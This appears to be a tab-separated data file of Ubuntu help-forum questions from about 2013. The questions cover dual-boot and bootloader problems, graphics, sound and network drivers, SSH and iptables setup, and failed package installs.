317083	dual boot encrypted ubuntu 13.04/12.04 ( option on installation cd ) and win7	really sorry if someone had already asked this question , but i searched on this topic for a long time and only came up with the ones that used truecrypt . so , is it possible to do the following : with win7 installation disk , install win7 on a 20gb partition i 've made for it . with ubuntu livecd , somehow chose the option to install the encrypted version of the installation ( which is on the menu ) . the order may be reversed , but will be best if you install win7 first , to save the bootloader problems .
317091	ubuntu will not allow me to add a repository , why ca n't it access ppa ?	when i type in this command : sudo add-apt-repository ppa : webupd8team/java the system echos something along the lines of `` ca n't access lanchpad.net ppa , please check your internet connection '' my internet connection is working fine , and just to see if it would help i reset my modem and router . still , no luck . i have also tried to add this ppa via ubuntu software center but that has not changed anything . how do i get past this error ? at this point i 'm considering totally re-installing ubuntu 13.04
317092	ubuntu 13.04 too slow to boot on good hardware even slower than windows 7	i have a ubuntu 13.04 installation and windows 7 dual boot on core i3 2.53ghz + 3gb memory , my installation is now almost 3 months old.the fresh installation was quite snappy ( yet slower than 12.04lts ) but now with time ubuntu is booting awfully slow . i have tried everything like preload , cutting down startup applications etc . i even uninstalled a lot of programs that i do n't use very often even then i do n't see any difference.it 's still slow , even windows 7 is reasonably faster on same machine
317096	ca n't log out after suspend	if i have n't suspended my computer , i can log out normally . if i have suspended it ( and then awake it and i put my password ) , if i choose to log out , i just get the prompt that says `` *checking battery state ... [ ok ] '' and it 's stuck there . i ca n't even change to a text terminal . any ideas ? thanks . p.s . since it 's `` suspend '' that somehow causes my problem , i tried re-creating the swap with the instructions given here adding swap partition after system installation at takkat 's comment . i think it worked , because i used to get some error from plymouth and i do n't get them anymore , but it did n't solve the logging out problem .
317103	highlighting and annotating chm files	i 'm looking for any chm reader/editor with a feature to highlight and annotate the book/text you are reading . i am using xchm and kchmviewer , but none of them has such features . i 've installed wine , so if there is any app for this purpose , either on linux or on windows , i would really appreciate if you let me know about it . of course , i can convert chm files to pdf files , but that 's not what i 'm looking for , because navigating through chm files is much easier and chm converters do n't work well enough ( they mess up the layout , links , ... ) thank you in advance .
317105	how to install nvidia optimus graphics card driver in ubuntu ?	i have a laptop with nvidia optimus graphics card.i have successfully installed its driver in windows 7 . when i tried to install its driver in ubuntu 13 it failed.i need to install the driver so that i can use the specific features of this card ( power saving option ) .how can i install nvidia optimus driver in ubuntu ? please help me ..
317106	how do i install catalyst drivers for ati mobillity radeon x1400 in 12.04 ?	i 'm trying to install drivers in ubuntu 12.04 for my ati mobility radeon x1400 and have n't worked out how to yet . i 'm not new to ubuntu but now that i want to play tf2 on it i need catalyst . can someone please tell me how to do this , thanks .
317107	how to restore windows on a samsung laptop with broken display ?	i have a broken monitor on my samsung 7 chronos ( np700z5c-s02ub ) , i can get it to show certain things in my external monitor , but only once ubuntu starts to load . i really need to return the laptop to bestbuy so that they can repair it , but to do that i first need to return it to the windows 8 installation it came with . but i ca n't do that without first accessing the bios , and i ca n't access the bios because i never see the samsung startup screen from which i can press f2 . my laptop is one of those affected by the whole samsung-bricks-in-linux thing , but i have only been booting it in bios mode . i only just had it returned from bestbuy 's geek squad ( my god , i believe they are trained to treat customers poorly ! ) , because the laptop initially came with the webcam not connected . it came back yesterday with details of an additional repair they 'd found necessary - `` replaced the defective lcd panel '' . i 'd never had problems with the lcd panel before i sent it away . the monitor worked yesterday . this is a list of everything i have done since i had the laptop returned to me . i created a back up disk image of windows 8 , i turned off uefi and fast boot , i stuck in the ubuntu 13.04 dvd , installed the system , and refreshed my files from my backup . i watched a tv episode through an external monitor . i unplugged the external monitor and messed around online for a while . then i closed the laptop . when i reopened it 5 minutes later the screen was completely black , no pushings of buttons had any effect . i held down the power cable for 4 seconds to shut down , and turned on again . i get the noise of the dvd drive starting up . i hear the harddrive powering up . the keyboard backlight comes on , along with the hard disk light and the power light . nothing more . i plug in the ac adapter ... ... same result . i plug in an external monitor ... ... success ! the external monitor shows my desktop , and everything appears to work . so , the screen is kaput ! though , the computer seems fine . but i ca n't change the bios settings because i never see the initial startup screen . is there a way to get at the bios settings through an external ? or does anyone know the exact keys i 'd have to press to change the settings back on this computer without observing the screen ? ( pressing f2 immediately after booting up appears to work , i press f10 to `` save changes and exit '' then press return , and the computer boots . ) i need to return the laptop , it 's been nothing but trouble to me , i 'd hope they 'd give me a refund but i expect they 'll insist on taking 2 weeks to fix it ) , but whatever i do i first need to return it to windows 8 . edit following a suggestion from my house mate , it 's not because the laptop thinks that the lid is open . cat /proc/acpi/button/lid/lid0/state returns state : open .
317109	qualcomm atheros ar8172/8176/8178 network unclaimed	i installed ubuntu os . the following is information about the version . root @ nithi-lenovo-g400s : ~ # uname -a linux nithi-lenovo-g400s 3.5.0-23-generic # 35~precise1-ubuntu smp fri jan 25 17:15:33 utc 2013 i686 i686 i386 gnu/linux root @ nithi-lenovo-g400s : ~ # this is on lenovo laptop model is g400s , wifi network is working fine , but wired network is not working . root @ nithi-lenovo-g400s : ~ # lshw -c network pci ( sysfs ) *-network unclaimed description : ethernet controller product : atheros communications inc. vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 version : 10 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list configuration : latency=0 resources : memory : d3500000-d353ffff ioport:2000 ( size=128 ) *-network description : wireless interface product : ar9485 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 24 : fd:52:4a : b4 : ff width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.5.0-23-generic firmware=n/a ip=192.168.0.100 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : d3400000-d347ffff memory : bfb00000-bfb0ffff root @ nithi-lenovo-g400s : ~ # root @ nithi-lenovo-g400s : ~ # sudo dmidecode -t 1 ; lspci ; lsusb ; lsb_release -a ; uname -a # dmidecode 2.11 smbios 2.7 present . handle 0x0001 , dmi type 1 , 27 bytes system information manufacturer : lenovo product name : 20244 version : lenovo g400s serial number : 3163417401775 uuid : fed012f9-23bd-e211-a312-2089849b0394 wake-up type : power switch sku number : lenovo_mt_20244 family : ideapad would you please advice where i can get drivers for network card and how to configure .
317115	distorted sound in kubuntu 13.04 64 bit - sound blaster x-fi	i am having this problem in kubuntu . whenever i play any audio , the sound is fuzzy , echoing , and distorted . i have looked up guides in the official ubuntu documentation , but they are for cards with no audio at all ... further research reveals that others besides me have difficulty with this card , the creative ! labs sound blaster x-fi sb0460 . i googled deeper into the internets and found a driver pack built by creative ! , which i downloaded , but when i tried to compile it it complained that it could not find my kernel source 's version.h - implying that it would probably not work with my kernel , and it is old software that would be nearly impossible to compile with modern software configuration . what confuses me is that the problem exists with kubuntu 64 bit , but not the 32 bit version . i also tried older and newer kernels but they did not work . does anyone have any info they can use to point me in the right direction ? anything will help , as i am at a dead end . thanks ! lsmod ( kubuntu 32 bit ) : module size used by pci_stub 12550 1 vboxpci 22896 0 vboxnetadp 25636 0 vboxnetflt 27261 0 vboxdrv 285137 3 vboxnetadp , vboxnetflt , vboxpci parport_pc 27504 0 ppdev 12817 0 rfcomm 37420 0 bnep 17669 2 bluetooth 202069 10 bnep , rfcomm binfmt_misc 17260 1 dm_crypt 22321 0 kvm_intel 126842 0 kvm 376505 1 kvm_intel snd_ctxfi 87112 0 dcdbas 14021 0 snd_pcm 80890 1 snd_ctxfi microcode 18286 0 joydev 17097 0 snd_page_alloc 14230 2 snd_ctxfi , snd_pcm snd_seq_midi 13132 0 snd_seq_midi_event 14475 1 snd_seq_midi snd_rawmidi 25114 1 snd_seq_midi nvidia 10287297 32 psmouse 81038 0 snd_seq 51280 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14137 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 24411 2 snd_pcm , snd_seq snd 56485 6 snd_ctxfi , snd_timer , snd_pcm , snd_seq , snd_rawmidi , snd_seq_device serio_raw 13031 0 mac_hid 13037 0 soundcore 12600 1 snd i2c_nforce2 12876 0 lp 13299 0 parport 40753 3 lp , ppdev , parport_pc pata_acpi 12886 0 hid_generic 12484 0 usbhid 41805 0 hid 82666 2 hid_generic , usbhid firewire_ohci 35292 0 firewire_core 61718 1 firewire_ohci crc_itu_t 12627 1 firewire_core pata_amd 13761 0 forcedeth 61777 0 sata_nv 23004 3 lsmod ( kubuntu 64 bit ) : module size used by parport_pc 28152 0 ppdev 17073 0 pci_stub 12622 1 vboxpci 23194 0 vboxnetadp 25670 0 vboxnetflt 23479 0 vboxdrv 320372 3 vboxnetadp , vboxnetflt , vboxpci bnep 18036 2 rfcomm 42641 0 bluetooth 228619 10 bnep , rfcomm kvm_intel 132891 0 kvm 443165 1 kvm_intel joydev 17377 0 dcdbas 14397 0 snd_ctxfi 107768 2 snd_pcm 97451 1 snd_ctxfi microcode 22881 0 snd_page_alloc 18710 2 snd_ctxfi , snd_pcm snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30180 1 snd_seq_midi snd_seq 61554 2 snd_seq_midi_event , snd_seq_midi nvidia 11309139 40 snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29425 2 snd_pcm , snd_seq snd 68876 10 snd_ctxfi , snd_timer , snd_pcm , snd_seq , snd_rawmidi , snd_seq_device soundcore 12680 1 snd psmouse 95870 0 serio_raw 13215 0 mac_hid 13205 0 i2c_nforce2 13020 0 lp 17759 0 parport 46345 3 lp , ppdev , parport_pc vesafb 13828 1 pata_acpi 13038 0 hid_generic 12540 0 usbhid 47074 0 hid 101002 2 hid_generic , usbhid forcedeth 66977 0 firewire_ohci 40103 0 firewire_core 64508 1 firewire_ohci crc_itu_t 12707 1 firewire_core pata_amd 14129 0 sata_nv 31812 5 cat /proc/asound/cards ( 64 bit ) : $ cat /proc/asound/cards 0 [ xfi ] : sb-xfi - creative x-fi creative x-fi 20k1 unknown cat /proc/asound/card0/codec # 0 ( 64 bit ) : $ cat /proc/asound/card0/codec # 0 cat : /proc/asound/card0/codec # 0 : no such file or directory
317116	how do i turn off upnp ?	hi i am trying to figure out how to remove/turnoff this service : upnp , i do n't like having it on because i feel it may pose a security risk on my machine . i can not find any guides or recipes on how to remove it completely / stop traffic from port 1900 and ip address 239.255.255.250 from sending data . i do n't have any devices that rely on this service in my local home network and was looking for some help getting rid of it either in the kernel or removing the application . i am not 100 % sure on what upnp is really , even though it may not be a security risk i still do n't like it running . any help is appreciated .
317118	install firefox v22 and firefox nightly without interference	i am going to be a tester for mozilla . i want to install firefox nightly and still keep my stable firefox . how can i do this ?
317122	how do i add a custom color to this script ?	this is the script . does anyone know how i can change the color of the text so when i open it in terminal it changes the color ? # ! /usr/bin/expect -f spawn -noecho bash expect `` $ `` send `` put what ever you want here '' interact exit i tried it but this is what came up in terminal 'prompt_blue=`tput setf 1` ps1= ' [ $ prompt_blue ] ' john @ john : ~ $ prompt_blue=`tput setf 1` john @ john : ~ $ ps1= ' [ $ prompt_blue ] ' [ ] perl put what ever you want here ' this is what shows up and i do n't know why hahaha
317127	ubuntu 12.04 and higher ca n't connect to lumia 800 wifi tethering	this is my first post so do n't hate please because i googled for hours about the anser to my question , but can not find . i have a nokia lumia 800 phone with windows phone 7.8 os i installed ubuntu 12.04 lts update on my notebook and i always connected to the internet with my phone . from that day , i ca n't . i updated to 13.04 but still not working . thank you for any help !
317129	is the meta-release upgrade ( do-release-upgrade ) secure ?	i am trying to understand the do-release-upgrade process i.e . the way that ubuntu prompts me to upgrade to the next spring or autumn ubuntu release . after reading the sources for ubuntu-release-upgrader i found the /etc/update-manager/meta-release file on my system . this file appears use an http url to point to http : //changelogs.ubuntu.com/meta-release where the various ubuntu releases from warty 04.10 to raring 13.04 are listed . this file lists the releases , their support status , the date of release and has a link to the release file . now the release file has a corresponding gpg signature and the sha1sum of the packages file which , in turn , has the sha1sum of the individual deb binaries that get installed . the recent releases also have an upgrade script and a corresponding gpg signature for these too . all sounds good . my question is about the meta-release file itself . it is not served over https and i can not find a gpg signature for it . if somebody replaces this file could they somehow cause my machine to upgrade ... ... to a signed release that has n't yet gone through security testing ? ... to an old release that is not supported and has unfixed security vulnerabilities ?
317130	no gui when i login to the enlightment de ( ubuntu 13.04 )	ubuntu noob here again . i recently installed the desktop environment enlightenment for ubuntu 13.04 . it was running great until now . i think it may have to do something with the monitor i hooked into my laptop . i can login to any other desktop environment just fine without any issues . however , when i login to enlightenment , i get a black screen with a cursor . i have to hard shutdown every time . how can i fix this ? i 've tried to login without my monitor plugged in , and it still does the same thing . maybe i can uninstall it ? i do not know the command though , so if that could be one solution , i do n't mind . just please make sure to leave the command to remove enlightenment in your answer if you do n't mind . thanks again !
317133	launch rails webrick server at startup	i want webrick running at startup . so i execute this command in terminal : crontab -e then added this line to the end of the file @ reboot /home/myname/.rvm/rubies/ruby-2.0.0-head/bin/ruby /home/myname/redmine-2.3.1/script/rails server webrick -e production and restarted ubuntu . however , the server still did n't start when my ubuntu booted . any help on this problem ?
317134	how do i remove hidden backup files ?	i have files ending in ~ in my home directory , and i want to delete them . how do i do that ? how do i prevent this backup functionality ?
317135	ways to authorize an app only once to run as root	i just wrote a small app that modifies a file in the /sys directory . basically , the file /sys/class/backlight/intel_backlight/brightness is modified to adjust brightness . so it requires root permission . the app is written in c++ and i am using the system function to run an echo command ( i just wanted the most simple solution ) . i was wondering if i could authorize the app once and then , whenever it is launched , it runs as root . i do n't want the app to request root permission every time it is launched . edit : $ ls -l -rwxrwxr-x 1 res res 413934 jul 6 22:08 brightnesscontrol thanks .
317145	runnning ubuntu 13.04 on asus laptop with pre-installed windows 8 and secure boot enabled	i had installed ubuntu 13.04 . the installation went on smoothly . but , after the installation was over , there was no grub that let me decide between ubuntu and windows 8 . so , i used easybcd . the grub appeared at the startup now . however , it would only run windows 8 . on running ubuntu , it would say something like , `` a recent hardware and software change has caused this ... use system repair etc.. and it will also mention something abut bcd . '' hence , i experimented some more , but unfortunately , i ended up deleting bcd entries ( or something else related mbr ) , because of which neither windows nor ubuntu would start . after reading a lot about how microsoft ships laptops that recognize only windows 8 , i disabled secured boot , used ubuntu repair and windows 8 repair . in the process , i ended up using commands like bootrec.exe and also encountered grub-rescue and what not . after all this nightmare , i am now back to square one . i do not want to do something stupid again . can anyone tell me what is the simplest way to set up a grub that would allow me to choose the os at the startup ?
317146	ca n't download packages in ubuntu 10.04	somebody help me . i have been going crazy for two days since i formatted my pc and reinstalled the only version of ubuntu that i had on cd ( 10.04 ) . i ca n't install any packages from the ubuntu software center , and evcery time i try it gives me an error message . i read all the answers to other similar questions , and i 've tried everything , but it still does n't work . in the synaptic package manager there are files that i would like to install ( for example vlc ) but it can neither download nor install anything . this is the error that i get when i try to download it from the ubuntu software center : failed to download repository information check your internet connection w : failed to fetch http : //it.archive .ubuntu.com/ubuntu/dists/maverick/restricted/source/sources.gz 404 not found [ ip : 193.206.140.45 80 ] w : failed to fetch http : //it.arc hive.ubuntu.com/ubuntu/dists/maverick/main/source/sources.gz 404 not found [ ip : 193.206.140.45 80 ]
317149	ubuntu 12.04 lts cpyrit-cuda/pyrit/cpyrit-opencl install problems	hi im having a problem building and installing pyrit cpyrit-cuda and cpyrit opencl here is what im getting when i try to build and run the installer.. brandon @ sanfran-dell-system-inspiron-n7110 : ~/cpyrit-opencl-0.4.0 $ sudo python setup.py install svn : ' . ' is not a working copy running install running build running build_ext building modules ... building 'cpyrit._cpyrit_opencl ' extension gcc -pthread -fno-strict-aliasing -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -fpic -i/usr/local/cuda/include -i/usr/include/python2.7 -c _cpyrit_opencl.c -o build/temp.linux-x86_64-2.7/_cpyrit_opencl.o -wall -fno-strict-aliasing -dversion= '' 0.4.0 '' gcc -pthread -shared -wl , -o1 -wl , -bsymbolic-functions -wl , -bsymbolic-functions -wl , -z , relro build/temp.linux-x86_64-2.7/_cpyrit_opencl.o -lcrypto -lz -lopencl -o build/lib.linux-x86_64-2.7/cpyrit/_cpyrit_opencl.so /usr/bin/ld : can not find -lopencl collect2 : ld returned 1 exit status error : command 'gcc ' failed with exit status 1 brandon @ sanfran-dell-system-inspiron-n7110 : ~/cpyrit-opencl-0.4.0 $ f someone please help if possible all responses are greatly appreciated thanks ! !
317150	laptop powers down for no apparent reason	over the past day , my laptop has been simply powering down for no apparent rhyme or reason , it has full charge , so no issues there . i ca n't think of any reason as to why this is happening . any help would be appreciated because this is leading to a lot of unsaved work being lost .
317151	iptables > mac filtering	i am newbie . i tried dhcp mac filtering is not enough to secure our networks and i think iptables will ... this is my concept : i set a new laboratory ( lab ) network . my other network is connected to a lab server running ubuntu 12.04 linux as a router . and my lab server is connected to the switch for lan pcs . here is the image : what i want is : i only want registered mac addresses to be able to have an internet/network connection . i want those registered mac addresses connected only to the a specific network address for file sharing . i want to know what are the steps should i follow . do i have to : flush all the iptables rules first then set default policies to drop or set default policies after mac filtering . i did some research related to these . link1 link2 link3 -- flushing all iptables rules ( all connections lost ) iptables -f iptables -x iptables -t nat -f iptables -t nat -x -- setting default policies to drop ( same ) iptables -p input drop iptables -p output drop iptables -p forward drop -- mac address filtering ( the rule save but still does n't work ) *list of mac addresses save to a mac_addresses_file* cat mac_addresses_file | while read macfile do iptables -a forward -m mac -- mac-source $ macfile -m state -- state new -j accept iptables -i input -m mac -- mac-source $ macfile -m state -- state new -j accept then set default policies to drop i am hoping for your help and we will work it out , guys . thanks
317155	dell inspiron 5220 screen brightness buttons	i 've installed ubuntu 13.04 , everything seems fine except using the fn-key to change the laptop 's brightness . it just stays permanently on full brightness . even if i go into system settings and change the brightness with the slider , it stays at full . does anyone have any ideas ? best regards
317165	from windows xp to ubuntu 13.04	i managed to dig out my old xp machine and want to install ubuntu on it . anyway , what i 'm wondering is whether i should choose the 32-bit or the 64-bit . on the download page there stands that if you have uefi firmware you should choose the 64-bit , but i do n't know what that is so ?
317167	will ubuntu non-carrier phones be available ?	i live in india , where cdma technology ( where you ca n't change your sim card , and you have to stick with one service provider once you buy the phone ) is not popular . gsm is the general trend . i am really really keen on buying an ubuntu phone . but so far , i have only heard of phones shipping ubuntu along with a carrier ( which i believe is the same as the service provider ) , and i 'm wondering if canonical will ship ubuntu phones , without any carriers , in which you can insert your own sim card ? i 've wanted the ubuntu phone to be my first smartphone . now , if ubuntu phone is going to release in april , 2014 , and that too , without gsm capability , i do n't know if i should wait for it to release . i want ubuntu phone to be my first smartphone , but if the wait is n't really worth it , should i go ahead with another phone now ?
317174	can not install apt-fast in ubuntu 12.10	i tried to install apt-fast in my ubuntu 12.10 but it shows following error : the following packages have unmet dependencies apt-fast : depends : aria2 but is not going to install build essential : depends : g++ ( > =4.4.4.3 ) but is not going to be installed depends : dpkg-dev ( > =1.13.5 ) but is not going to be installed '' please help me because these errors are shown everywhere - whatever i want to install .
317176	ssh connection problems	i 'm having troubles with a simple ssh connection at home . i installed openssh on an ubuntu server . i generated the rsa and dsa but this ssh connection stops while expecting a msg packaget that i do n't understand . i previuosly installed no-ip and linked it to my network but i think this is not the problem . openssh_6.1p1 debian-4 , openssl 1.0.1c 10 may 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : connecting to blue-house.servebeer.com [ 87.221.76.172 ] port 22. debug1 : connection established . debug1 : identity file /home/miguel/.ssh/id_rsa type -1 debug1 : identity file /home/miguel/.ssh/id_rsa-cert type -1 debug1 : identity file /home/miguel/.ssh/id_dsa type -1 debug1 : identity file /home/miguel/.ssh/id_dsa-cert type -1 debug1 : identity file /home/miguel/.ssh/id_ecdsa type -1 debug1 : identity file /home/miguel/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version dropbear_0.36 debug1 : no match : dropbear_0.36 debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_6.1p1 debian-4 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client 3des-cbc hmac-md5 none debug1 : kex : client- > server 3des-cbc hmac-md5 none debug1 : sending ssh2_msg_kexdh_init debug1 : expecting ssh2_msg_kexdh_reply read from socket failed : connection reset by peer update 1 : there is something related with dropbear_o.36 that is very old in my router . here a post an image that shows that i have no problems to connect straight with my ip , but with a dns ( i have set up 2 , no-ip and freedns , but got the same result ) i think i ca n't update my router firmware anymore ... what should i do ?
317180	how to colorize xubuntu13.04 terminal ?	on some pictures from the internet there are colors in terminal . even cygwin under windows has colors in its terminal . here a pic from the internet , for example : i have installed xubuntu and my terminal is like windows cmd - has only two colors : background and text color . name of user is not green . only folders are shown in blue on ls command . no more any colors . how to enable colorful terminal in xubuntu 13.04 ?
317182	how to get rid of s.m.a.r.t . warning that displays at boot ?	this is what displays right before windows boot manager , i have dual boot : failure predicted on hard disk 2 : wdc wd1600bevt -22zct0- ( s1 ) warning : immediately back-up your data and replace your hard drive . a failure may be imminent . press f1 to continue . i 've already tried smartmontools , any suggestions ? also , i have a phoenix bios , which does n't have the ability to disable it from there .
317184	screen goes blank when installing ubuntu on asus zenbook ux31a	i have a problem installing any ubuntu distribution ( 12.04 , 12.10 , 13.04 ) on my asus zenbook ux31a-c4046h . when i tried with the live usb boot , selecting install led to a blank screen . i have intel hd graphics 4000 . is this a problem with the graphics card ? what could i do ? i found the below website , tried to edit grub - replace splash by nomodeset then push f10 , still no result . http : //webent.altervista.org/2012/09/16/how-to-install-ubuntu-linux-12-04-or-newer-on-the-zenbook-ux32vd/
317187	unable to mount ipod in ubuntu 13.04	i get the following error message : unable to open mtp device ' [ usb:001,004 ] ' i have a 1st generation ipod touch . the ipod worked fine with ubuntu until about a month ago . i use rhythmbox version 2.98 . i have no other external devices plugged in .
317188	how to get rid of s.m.a.r.t . warnings that dispay at boot of system , not ubuntu	this is what displays right before windows boot manager , i have dual boot : failure predicted on hard disk 2 : wdc wd1600bevt -22zct0- ( s1 ) warning : immediately back-up your data and replace your hard drive . a failure may be imminent . press f1 to continue . i 've already tried smartmontools , any suggestions ? also , i have a phoenix bios , which does n't have the ability to disable it from there . this is not a little pop-up that dispays when i start ubutnu , and i 've already disabled that , this is not a duplicate , hear me ? not a duplicate .
317189	wubi : request not supported when installing to a partition , 13.04	when i use wubi.exe to install ubuntu to a partition on another hdd i get this error ( http : //pastebin.com/pvf4md1k ) : 07-06 20:23 debug windowsbackend : modify_bcd drive ( a : hd 129914.515625 mb free ntfs ) 07-06 20:23 error tasklist : error executing command > > command=c : \windows\sysnative\bcdedit.exe /set { f544d06e-4e60-11e2-885c-a62c26d2ce07 } device partition=h : > > retval=1 > > stderr=an error has occurred setting the element data . the request is not supported . what can i do ? this is stopping me from installing ubuntu/linux . i chose 30 gb as the install size and i chose the correct partition etc . it is ubuntu desktop 13.04 by the way .
317198	kernel patch for touchpad	i think this kernel patch can fix alps touch-pad can anyone help me to apply it on my system ? https : //patchwork.kernel.org/patch/2326461/
317199	prosavage8 km266/kl266 refuses to work in ubuntu 12.04	i am trying to configure an old laptop , and this is driving me up the wall . i have spent at least ten hours trying solutions to no avail . i initally installed mesa 7.11 , which did not work . i currently have mesa 8 along with the xorg edgers mesa-legacy 7.11 drivers . sudo lshw -c video returns : display unclaimed description : vga compatible controller product : vt8375 [ prosavage8 km266/kl266 ] vendor : s3 inc. physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 32 bits clock : 66mhz capabilities : vga_controller bus_master cap_list configuration : latency=64 maxlatency=255 mingnt=4 my current xorg.conf looks like this : section `` serverlayout '' identifier `` x.org configured '' screen `` default screen '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` record '' load `` dbe '' load `` extmod '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor generic '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' identifier `` card0 '' driver `` savage '' endsection section `` screen '' identifier `` default screen '' device `` card0 '' monitor `` monitor generic '' subsection `` display '' depth 32 endsubsection endsection i have tried many different xorg options , downgrades of driver packages and the like . the only two outcomes i have been able to achieve are : noaccel in xorg.conf : vga driver is used , and glxgears gets ~5 fps . not an optimal outcome . anything else : any opengl application crashes on startup with the error `` wait returned -16 '' and the system completely locks up , necessitating power cycling . well , there is a third outcome that i noticed : enabling shadowfb caused artifacts all over the screen and made the bottom half of the screen unusable . any help is much appreciated . i have seen that this issue has been raised before on several websites while trying to diagnose this problem , but nothing suggested has worked .
317200	i just installed ubuntu 13.04 and i can not connect to the network	i just installed ubuntu 13.04 on my dell inspiron 1501 . now i have no network capability . i had the same problem with 12.04 . ubuntu 11.10 only recognised my wired network , but not wifi . what can i do to fix this ? i am sending this message from my phone .
317201	how do i install the latest version of chromium in ubuntu 13.10 ?	previously this same question was asked , however all of the answers are wrong -- including the chosen one . so , let 's try it again . ( i 've specified the ubuntu version number at the top to indicate the newness of this one ) . i 'm coming at this as someone who has just installed ubuntu and truly wants the latest version of chromium . currently , the most recent version of chromium is version 30 . ppas that do n't work and should not be suggested : ppa : a-v-shkop/chromium as of writing , this ppa only supports version 25 in stable and version 27 in dev . it has n't been updated in three months . ppa : chromium-daily/ppa as of writing , this ppa only supports version 18 . this ppa is so outdated that i 've submitted a bug report suggesting it be shut down . ppa : webapps/preview as of writing , this ppa only supports version 20 . it has n't been updated in 11 months .
317203	upgraded to 12.10 , ca n't boot up	so i had ubuntu 12.04 , and all was well - except it froze occasionally . monkeying around with the kernel made no difference , so i asked here ( ca n't find my old question ) . someone advised upgrading to 12.10 , so i did it but it did n't boot . all i get is a partial boot and a black screen . i managed to get into the grub , and messed about in recovery mode . if i go via recovery mode , i can get to a command line , but it freezes after a couple of minutes . i tried doing sudo apt-get update , tried uninstalling and reinstalling graphics drivers , tried the whole clean/dpkg repair/check file system , not going so well . i boot off a usb now , which means i get a fresh system each time which sucks , ca n't boot graphically , and do n't really know what i 'm doing with the command line . can anyone help me ? update and more info : i used the boot repair program , it made no difference . it returned http : //paste.ubuntu.com/5855376 , so there might be some helpful info in there ? my computer is an acer aspire 5750 , it has an intel® core™ i5-2430m cpu @ 2.40ghz × 4 , and intel hd graphics 3000 . not sure which graphics drivers i should be using , but i do n't have nvidia , which i understand was the cause of some similar trouble . update the second : i 've narrowed it down a bit more . it seems like an incomplete install of x11 , according to my friend who is more knowledgeable about these things . cat /var/log/xorg.0.log puts out http : //paste.ubuntu.com/5861520/ , which seems to basically say that it ca n't load intel , vesa , modesetting or fbdev ( also some fonts are missing , but i doubt that 's the problem ) . i tried adding the x-updates repository and doing apt-get update and apt-get dist-upgrade ( with and without -f and -m ) , but it appears to have made no difference whatsoever . on the advice of , i made /etc/x11/xorg.conf ( which was missing before ) and put in section `` device '' identifier `` intel '' driver `` intel '' option `` accelmethod '' `` uxa '' endsection but it changed nothing . not sure what to do now .
317207	installing ubuntu 13.04 via the windows installer	hello , *if i install ubuntu 13.04 using the windows installer , will it overwrite my windows ? * i am asking this because i like the freedom of ubuntu , but i want windows just in case thanks : )
317215	how to modify grub.conf for ubuntu partition	i was trying to install ubuntu 13 on my new lenovo computer with haswell processor and nvidia g750m . i have never installed linux before and learned basic unix commands last week . i was following a guide : unable to install ubuntu on lenovo y500 however , i got to the part where i was able to install ubuntu successfully , but now i ca n't open it ( the screen turns off when it opens ) . i need to be able to finish the final steps , in order to fix my issues but i ca n't seem to locate the partition linux is on , everything is a gpt partition table with no labels when i do fdisk -l : 5 ) after the install is complete , boot again with your usb and select `` try ubuntu '' and let it boot to the text console . you will not be able to use this new ubuntu install until you edit this grub.cfg as well . to do this , first mount this new partition , and then edit the grub.cfg as above in the ubuntu editor of your choice ( vi , nano , etc ) . sudo mkdir /mnt/newinstall sudo mount /mnt/newinstall /dev/sdb8 sudo vi /mnt/newinstall/boot/grub/grub.conf ( same edits as listed in step 3 . also on my install ubuntu was on the 8th partition > /dev/sdb8 . yours may vary so check it first ! ) ** note the file is write protected , so make sure you use `` : w ! '' to write from vi . trying to input those exact commands gives me : /mnt/newinstall is not a block device i really want to start using ubuntu but i ca n't without changing the one line in grub.conf ( i think )
317218	turn off ethernet without turning off wifi	i 'm new to ubuntu but somewhat familiar with pci . i noticed that when i disable networking ( by unchecking the 'enable networking ' ) the eth controller moves to d3 state ( sudo lspci -vv ) , but that also means i have no wifi and it too moves to d3 . is it possible to 'decouple ' the two ? i never use the eth , and would like to have it turned off / in d3 in order to save power , but would still like to have wifi . thanks in advance ...
317226	is any instance/part of windows running while ubuntu desktop on wubi is running ?	i recently installed ubuntu desktop 12.04 to dual-boot using wubi , so the system files are inside c : \ubuntu and , on boot , i can choose which os to use . since the system files are located in the windows partition , is windows ( 7 ) running in any way , somewhat like a virtual machine would ? or does wubi and ubuntu ignore the windows operating system already installed on the c : drive ?
317230	how can i temporarily disable a kernel module ?	i would like to temporarily ( until next boot ) disable a kernel module . how can i do this ?
